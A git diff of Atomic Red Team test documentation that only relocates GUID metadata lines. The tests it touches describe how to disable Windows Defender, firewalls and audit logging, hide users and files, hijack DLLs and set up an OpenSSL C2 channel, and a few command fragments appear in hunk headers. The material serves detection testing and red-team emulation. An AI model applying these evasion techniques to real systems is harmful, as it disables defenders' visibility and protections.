## Atomic Test #16 - Tamper with Windows Defender Command Prompt - -auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2 - Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** aa875ed4-8935-47e2-b2c5-6ec00ab220d2 + + + @@ -670,14 +702,16 @@ sc config WinDefend start=enabled >nul 2>&1
## Atomic Test #17 - Tamper with Windows Defender Registry - -auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 - Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. + **Supported Platforms:** Windows +**auto_generated_guid:** 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 + + + @@ -701,17 +735,19 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #18 - Disable Microsoft Office Security Features - -auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 - Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + **Supported Platforms:** Windows +**auto_generated_guid:** 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 + + + @@ -742,17 +778,19 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #19 - Remove Windows Defender Definition Files - -auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 - Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + **Supported Platforms:** Windows +**auto_generated_guid:** 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 + + + @@ -772,13 +810,15 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service - -auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143 - Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. + **Supported Platforms:** Windows +**auto_generated_guid:** ae753dda-0f15-4af6-a168-b9ba16143143 + + + #### Inputs: @@ -804,13 +844,15 @@ Remove-Service -Name #{service_name}
## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows - -auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 - Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. + **Supported Platforms:** Windows +**auto_generated_guid:** b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 + + + #### Inputs: @@ -835,15 +877,17 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder - -auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed - Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath + **Supported Platforms:** Windows +**auto_generated_guid:** 0b19f4ee-de90-4059-88cb-63c800c683ed + + + #### Inputs: @@ -874,15 +918,17 @@ Remove-MpPreference -ExclusionPath $excludedpath
## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension - -auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea - Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. + **Supported Platforms:** Windows +**auto_generated_guid:** 315f4be6-2240-4552-b3e1-d1047f5eecea + + + #### Inputs: @@ -913,15 +959,17 @@ Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process - -auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27 - Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess." + **Supported Platforms:** Windows +**auto_generated_guid:** a123ce6a-3916-45d6-ba9c-7d4081315c27 + + + #### Inputs: diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md index 01ba57e2..213de5a4 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1562.002/T1562.002.md @@ -18,16 +18,18 @@ Adversaries may targeting system-wide logging or just that of a particular appli
## Atomic Test #1 - Disable Windows IIS HTTP Logging - -auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db - Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) + **Supported Platforms:** Windows +**auto_generated_guid:** 69435dcf-c66f-4ec0-a8b1-82beb76b34db + + + #### Inputs: @@ -58,13 +60,15 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
## Atomic Test #2 - Kill Event Log Service Threads - -auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd - Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html + **Supported Platforms:** Windows +**auto_generated_guid:** 41ac52ba-5d5e-40c0-b267-573ed90489bd + + + @@ -96,14 +100,16 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
## Atomic Test #3 - Impair Windows Audit Log Policy - -auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 - Disables the windows audit policy to prevent key host based telemetry being written into the event logs. [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) + **Supported Platforms:** Windows +**auto_generated_guid:** 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 + + + @@ -131,13 +137,15 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
## Atomic Test #4 - Clear Windows Audit Policy Config - -auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 - Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. + **Supported Platforms:** Windows +**auto_generated_guid:** 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 + + + diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md index 6a66d737..d081df79 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1562.003/T1562.003.md @@ -18,13 +18,15 @@ On Windows systems, the PSReadLine module tracks commands used in a
## Atomic Test #1 - Disable history collection - -auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 - Disables history collection in shells + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 + + + #### Inputs: @@ -50,16 +52,18 @@ export HISTCONTROL=ignoreboth
## Atomic Test #2 - Mac HISTCONTROL - -auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d - The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 468566d5-83e5-40c1-b338-511e1659628d + + + #### Run it with these steps! diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index f9e8b9f6..27d556d3 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -24,13 +24,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
## Atomic Test #1 - Disable firewall - -auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 - Disables the firewall + **Supported Platforms:** Linux +**auto_generated_guid:** 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 + + + #### Inputs: @@ -60,14 +62,16 @@ Disables the firewall
## Atomic Test #2 - Disable Microsoft Defender Firewall - -auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f - Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + **Supported Platforms:** Windows +**auto_generated_guid:** 88d05800-a5e4-407e-9b53-ece4174f197f + + + @@ -91,14 +95,16 @@ netsh advfirewall set currentprofile state on >nul 2>&1
## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry - -auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 - Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + **Supported Platforms:** Windows +**auto_generated_guid:** afedc8c4-038c-4d82-b3e5-623a95f8a612 + + + @@ -122,14 +128,16 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Param
## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall - -auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 - Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... + **Supported Platforms:** Windows +**auto_generated_guid:** d9841bf8-f161-4c73-81e9-fd773a5ff8c1 + + + @@ -154,15 +162,17 @@ netsh advfirewall reset >nul 2>&1
## Atomic Test #5 - Opening ports for proxy - HARDRAIN - -auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 - This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** 15e57006-79dd-46df-9bf9-31bc24fb5a80 + + + @@ -186,13 +196,15 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
## Atomic Test #6 - Open a local port through Windows Firewall to any profile - -auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed - This test will attempt to open a local port defined by input arguments to any profile + **Supported Platforms:** Windows +**auto_generated_guid:** 9636dd6e-7599-40d2-8eee-ac16434f35ed + + + #### Inputs: @@ -221,13 +233,15 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location - -auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c - This test will attempt to allow an executable through the system firewall located in the Users directory + **Supported Platforms:** Windows +**auto_generated_guid:** 6f5822d2-d38d-4f48-9bfc-916607ff6b8c + + + #### Inputs: diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md index c4da8863..1db3c799 100644 --- a/atomics/T1562.006/T1562.006.md +++ b/atomics/T1562.006/T1562.006.md @@ -16,13 +16,15 @@ In the case of network-based reporting of indicators, an adversary may block tra
## Atomic Test #1 - Auditing Configuration Changes on Linux Host - -auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 - Emulates modification of auditd configuration files + **Supported Platforms:** Linux +**auto_generated_guid:** 212cfbcf-4770-4980-bc21-303e37abd0e3 + + + #### Inputs: @@ -63,13 +65,15 @@ sed -i '$ d' /etc/#{libaudit_config_file_name}
## Atomic Test #2 - Logging Configuration Changes on Linux Host - -auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c - Emulates modification of syslog configuration. + **Supported Platforms:** Linux +**auto_generated_guid:** 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c + + + #### Inputs: diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md index 766f1007..51534980 100644 --- a/atomics/T1563.002/T1563.002.md +++ b/atomics/T1563.002/T1563.002.md @@ -12,13 +12,15 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking - -auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46 - [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization + **Supported Platforms:** Windows +**auto_generated_guid:** a37ac520-b911-458e-8aed-c5f1576d9f46 + + + #### Inputs: diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md index 33358e45..35dbb5bc 100644 --- a/atomics/T1564.001/T1564.001.md +++ b/atomics/T1564.001/T1564.001.md @@ -28,13 +28,15 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
## Atomic Test #1 - Create a hidden file in a hidden directory - -auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be - Creates a hidden file inside a hidden directory + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be + + + @@ -59,13 +61,15 @@ rm -rf /var/tmp/.hidden-directory/
## Atomic Test #2 - Mac Hidden file - -auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 - Hide a file on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** cddb9098-3b47-4e01-9d3b-6f5f323288a9 + + + @@ -85,14 +89,16 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib - -auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 - Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details and observe that the Attributes are "SA" for System and Archive. + **Supported Platforms:** Windows +**auto_generated_guid:** f70974c8-c094-4574-b542-2c545af95a32 + + + #### Inputs: @@ -133,14 +139,16 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #4 - Create Windows Hidden File with Attrib - -auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5 - Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file and observe that the Attributes are "SH" for System and Hidden. + **Supported Platforms:** Windows +**auto_generated_guid:** dadb792e-4358-4d8d-9207-b771faa0daa5 + + + #### Inputs: @@ -181,13 +189,15 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #5 - Hidden files - -auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 - Requires Apple Dev Tools + **Supported Platforms:** macOS +**auto_generated_guid:** 3b7015f2-3144-4205-b799-b05580621379 + + + #### Inputs: @@ -212,13 +222,15 @@ setfile -a V #{filename}
## Atomic Test #6 - Hide a Directory - -auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 - Hide a directory on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 + + + @@ -243,13 +255,15 @@ rm /var/tmp/T1564.001_mac.txt
## Atomic Test #7 - Show all hidden files - -auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c - Show all hidden files on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** 9a1ec7da-b892-449f-ad68-67066d04380c + + + diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md index eb504c9a..766c53ee 100644 --- a/atomics/T1564.002/T1564.002.md +++ b/atomics/T1564.002/T1564.002.md @@ -14,13 +14,15 @@ There is a property value in /Library/Preferences/com.apple.loginwindow ## Atomic Test #1 - Create Hidden User using UniqueID < 500 - -auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507 - Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) + **Supported Platforms:** macOS +**auto_generated_guid:** 4238a7f0-a980-4fff-98a2-dfc0a363d507 + + + #### Inputs: @@ -49,13 +51,15 @@ sudo dscl . -delete /Users/#{user_name}
## Atomic Test #2 - Create Hidden User using IsHidden option - -auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 - Add a hidden user on macOS using IsHidden optoin + **Supported Platforms:** macOS +**auto_generated_guid:** de87ed7b-52c3-43fd-9554-730f695e7f31 + + + #### Inputs: diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md index a554980d..cdc08590 100644 --- a/atomics/T1564.003/T1564.003.md +++ b/atomics/T1564.003/T1564.003.md @@ -16,14 +16,16 @@ Adversaries may abuse these functionalities to hide otherwise visible windows fr
## Atomic Test #1 - Hidden Window - -auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a - Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** f151ee37-9e2b-47e6-80e4-550b9f999b7a + + + #### Inputs: diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md index 1a314f8c..6ad1f5eb 100644 --- a/atomics/T1564.004/T1564.004.md +++ b/atomics/T1564.004/T1564.004.md @@ -18,17 +18,19 @@ Adversaries may store malicious data or binaries in file attribute metadata inst
## Atomic Test #1 - Alternate Data Streams (ADS) - -auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4 - Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) + **Supported Platforms:** Windows +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f4602364f4 + + + #### Inputs: @@ -62,14 +64,16 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS) - -auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 - Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test + **Supported Platforms:** Windows +**auto_generated_guid:** 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 + + + #### Inputs: @@ -103,14 +107,16 @@ Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
## Atomic Test #3 - Create ADS command prompt - -auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb - Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" + **Supported Platforms:** Windows +**auto_generated_guid:** 17e7637a-ddaf-4a82-8622-377e20de8fdb + + + #### Inputs: @@ -141,14 +147,16 @@ del #{file_name} >nul 2>&1
## Atomic Test #4 - Create ADS PowerShell - -auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 - Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 + + + #### Inputs: diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 4bdd4e75..08e4f131 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -16,9 +16,6 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
## Atomic Test #1 - Extract binary files via VBA - -auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a - This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored @@ -30,9 +27,14 @@ This sample contains a document inside of itself. Document 1 is the actual maldo is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + + + @@ -76,13 +78,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Create a Hidden User Called "$" - -auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 - Creating a user with a username containing "$" + **Supported Platforms:** Windows +**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778 + + + @@ -106,13 +110,15 @@ net user $ /DELETE 2>&1
## Atomic Test #3 - Create an "Administrator " user (with a space on the end) - -auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c - Creating a user with a username containing with a space on the end + **Supported Platforms:** Windows +**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c + + + diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 7a3de378..da4434af 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -14,15 +14,17 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript - -auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306 - The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. File is downloaded to the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 114ccff9-ae6d-4547-9ead-4cd69f687306 + + + @@ -53,14 +55,16 @@ else{
## Atomic Test #2 - Word spawned a command shell and used an IP address in the command line - -auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f - Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8 + **Supported Platforms:** Windows +**auto_generated_guid:** cbb6799a-425c-4f83-9194-5447a909d67f + + + #### Inputs: diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md index 1c14ffe9..a4b90c7a 100644 --- a/atomics/T1569.001/T1569.001.md +++ b/atomics/T1569.001/T1569.001.md @@ -14,13 +14,15 @@ Running a command from launchctl is as simple as launchctl submit -l ## Atomic Test #1 - Launchctl - -auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 - Utilize launchctl + **Supported Platforms:** macOS +**auto_generated_guid:** 6fb61988-724e-4755-a595-07743749d4e2 + + + #### Inputs: diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md index 6015e492..7ecc1ec7 100644 --- a/atomics/T1569.002/T1569.002.md +++ b/atomics/T1569.002/T1569.002.md @@ -16,15 +16,17 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
## Atomic Test #1 - Execute a Command as a Service - -auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1 - Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` + **Supported Platforms:** Windows +**auto_generated_guid:** 2382dee2-a75f-49aa-9378-f52df6ed3fb1 + + + #### Inputs: @@ -56,16 +58,18 @@ del C:\art-marker.txt >nul 2>&1
## Atomic Test #2 - Use PsExec to execute a command on a remote host - -auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c - Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will start a process on a remote host. Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). + **Supported Platforms:** Windows +**auto_generated_guid:** 873106b7-cfed-454b-8680-fa9f6400431c + + + #### Inputs: diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index a9aae7f5..3549804a 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -12,14 +12,16 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell - -auto_generated_guid: 21fe622f-8e53-4b31-ba83-6d333c2583f4 - Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful port check will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 21fe622f-8e53-4b31-ba83-6d333c2583f4 + + + #### Inputs: @@ -45,13 +47,15 @@ Test-NetConnection -ComputerName #{domain} -port #{port}
## Atomic Test #2 - Testing usage of uncommonly used port - -auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 - Testing uncommonly used port utilizing telnet. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767 + + + #### Inputs: diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md index ef035415..ce3ca961 100644 --- a/atomics/T1573/T1573.md +++ b/atomics/T1573/T1573.md @@ -10,18 +10,20 @@
## Atomic Test #1 - OpenSSL C2 - -auto_generated_guid: 21caf58e-87ad-440c-a6b8-3ac259964003 - Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. + **Supported Platforms:** Windows +**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003 + + + #### Inputs: diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index dcc50b0e..10700bb9 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -16,16 +16,18 @@ If a search order-vulnerable program is configured to run at a higher privilege
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll - -auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + + + diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index 10229d09..74667b1d 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -12,14 +12,16 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary - -auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 65526037-7079-44a9-bda1-2cb624838040 + + + #### Inputs: diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index ec61d98f..45fef5aa 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -18,15 +18,17 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
## Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload - -auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + **Supported Platforms:** Linux +**auto_generated_guid:** 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + + + #### Inputs: @@ -68,15 +70,17 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
## Atomic Test #2 - Shared Library Injection via LD_PRELOAD - -auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + **Supported Platforms:** Linux +**auto_generated_guid:** bc219ff7-789f-4d51-9142-ecae3397deae + + + #### Inputs: diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md index ffc87c80..b32b1035 100644 --- a/atomics/T1574.009/T1574.009.md +++ b/atomics/T1574.009/T1574.009.md @@ -14,15 +14,17 @@ This technique can be used for persistence if executables are called on a regula
